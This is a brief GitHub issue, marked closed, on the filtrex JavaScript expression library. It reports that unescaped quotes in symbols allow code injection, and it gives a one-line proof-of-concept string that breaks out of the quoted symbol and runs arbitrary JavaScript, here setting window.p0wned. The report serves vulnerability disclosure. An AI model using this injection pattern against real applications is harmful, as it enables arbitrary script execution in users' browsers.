joewalnes/filtrex

Security bug – unescaped quotes in symbol

Closed this issue · 0 comments

m93a commented

This will p0wn your browser.

compileExpression(`'"+(window.p0wned=true)+"'`)({});